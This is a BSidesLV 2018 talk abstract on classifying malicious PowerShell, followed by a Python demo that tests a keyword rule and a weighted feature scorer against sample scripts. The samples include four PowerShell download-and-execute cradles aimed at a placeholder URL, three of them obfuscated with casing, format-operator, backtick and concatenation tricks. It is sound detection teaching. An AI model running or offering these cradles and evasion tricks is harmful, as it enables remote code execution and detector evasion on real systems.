PowerShell Classification: Life, Learning, and Self-Discovery

BSidesLV 2018

Presented by: Derek Thomas
Date: Wednesday, August 08, 2018
Time: 11:00 - 11:55
Location: Ground Truth

By now, many security practitioners know that PowerShell is a powerful scripting language used by administrators and adversaries alike. Many blue-team professionals may also know that effective detective controls are very difficult to develop due to the flexibility of PowerShell. This presentation covers the journey in which I tried to develop effective detective mechanisms for malicious PowerShell, the shortcomings of that attempt, my first attempt at developing a classifier, the problems I encountered, the lessons I learned, and the success in the end. I will cover the development of the initial prototype from start to finish, but the greatest value is in the lessons that were learned during the journey.
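The abstract's central claim, that PowerShell's flexibility defeats simple detective controls, is easy to see with a few concrete scripts. The example below is an added illustration for this page, not code from the talk or the speaker's classifier. It runs a keyword rule against four constructed spellings of the same download-and-execute cradle, then combines a handful of structural features into a score. The sample scripts, the placeholder URL, the feature set, the weights and the threshold are all assumptions made for the demo; a real classifier would learn its weights from labelled data.

```python
"""Keyword matching vs. structural features for PowerShell detection.

Added illustration; not the speaker's code or classifier. The sample
scripts, the placeholder URL, the feature set and the weights are all
constructed for this example.
"""
import re

URL = "http://example.invalid/p.ps1"   # placeholder, resolves nowhere

# Constructed samples: two ordinary admin one-liners ...
BENIGN = {
    "list-large-logs": r"Get-ChildItem -Path C:\Logs -Filter *.log -Recurse | "
                       r"Where-Object { $_.Length -gt 1MB } | Select-Object FullName, Length",
    "export-services": r"Get-Service | Where-Object Status -eq 'Running' | "
                       r"Export-Csv -NoTypeInformation -Path C:\Temp\services.csv",
}

# ... and four spellings of the same download-and-execute cradle.
MALICIOUS = {
    # 1. the textbook cradle
    "plain": f"IEX (New-Object Net.WebClient).DownloadString('{URL}')",
    # 2. random casing; PowerShell is case-insensitive, so this runs unchanged
    "casing": f"iEx (nEw-oBjEcT nEt.wEbClIeNt).dOwNlOaDsTrInG('{URL}')",
    # 3. IEX reassembled with the -f format operator and invoked through '.';
    #    the method name is a double-quoted string with a backtick escape,
    #    which PowerShell resolves to DownloadString at run time
    "backtick": '.("{1}{0}" -f \'EX\',\'I\') (New-Object Net.WebClient)'
                f'."Down`loadString"(\'{URL}\')',
    # 4. names built by string concatenation, method called as $obj.$name(),
    #    result executed through a scriptblock instead of IEX
    "concat": "$m = 'Down' + 'loadStr' + 'ing'; $w = New-Object ('Net.Web' + 'Client'); "
              f"& ([scriptblock]::Create($w.$m('{URL}')))",
}

# A naive detective control: the substrings an analyst reaches for first.
NAIVE_RULE = re.compile(r"downloadstring|invoke-expression|\biex\b", re.IGNORECASE)

def naive_hit(script: str) -> bool:
    """True if the keyword rule fires on the script text."""
    return NAIVE_RULE.search(script) is not None

# Structural signals that survive renaming or hiding the keywords.
STRING_CONCAT = re.compile(r"['\"]\s*\+\s*['\"]")       # 'Down' + 'load'
DQ_STRING = re.compile(r'"[^"]*"')                       # to find backticks inside strings
DYNAMIC_INVOKE = re.compile(
    r"\[scriptblock\]::create"   # run-time code construction
    r"|[&.]\s*\("                # & (...) / . (...): invoking a computed name
    r"|\$\w+\.\$\w+"             # $obj.$member: member name held in a variable
    r"|-f\s"                     # format operator, the usual way to rebuild IEX
    r"|-join\b|\[char\]",        # char-code assembly
    re.IGNORECASE)

def features(script: str) -> dict:
    """Count each signal; every one is evadable alone, the mix is harder."""
    return {
        "keyword_hits": len(NAIVE_RULE.findall(script)),
        "string_concat": len(STRING_CONCAT.findall(script)),
        "backticks_in_strings": sum(s.count("`") for s in DQ_STRING.findall(script)),
        "dynamic_invoke": len(DYNAMIC_INVOKE.findall(script)),
    }

# Hand-picked weights for the demo (assumption); a trained model learns these.
WEIGHTS = {"keyword_hits": 1.5, "string_concat": 1.5,
           "backticks_in_strings": 2.0, "dynamic_invoke": 1.5}
THRESHOLD = 2.0

def score(script: str) -> float:
    f = features(script)
    return sum(WEIGHTS[k] * f[k] for k in WEIGHTS)

def classify(script: str) -> bool:
    """Linear score against a fixed threshold: the simplest classifier shape."""
    return score(script) >= THRESHOLD

def evaluate() -> dict:
    """Per-sample verdicts from both approaches, side by side."""
    out = {}
    for label, bucket in (("benign", BENIGN), ("malicious", MALICIOUS)):
        for name, script in bucket.items():
            out[name] = {"label": label, "naive": naive_hit(script),
                         "score": score(script), "classifier": classify(script)}
    return out

if __name__ == "__main__":
    for name, v in evaluate().items():
        print(f"{name:16} {v['label']:9} naive={v['naive']!s:5} "
              f"score={v['score']:.1f} classifier={v['classifier']}")
```

The keyword rule catches the plain and re-cased cradles and misses the other two, even though all four do exactly the same thing. The feature score flags all four and neither benign script, but only because no single variant evades every signal at once: the concatenated variant carries no keyword, the backtick variant no concatenation. None of these features is safe on its own (backtick escapes and `-f` appear in plenty of legitimate scripts), which is the reason to let training data set the weights and to measure false positives on real administrative traffic before trusting such a score.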
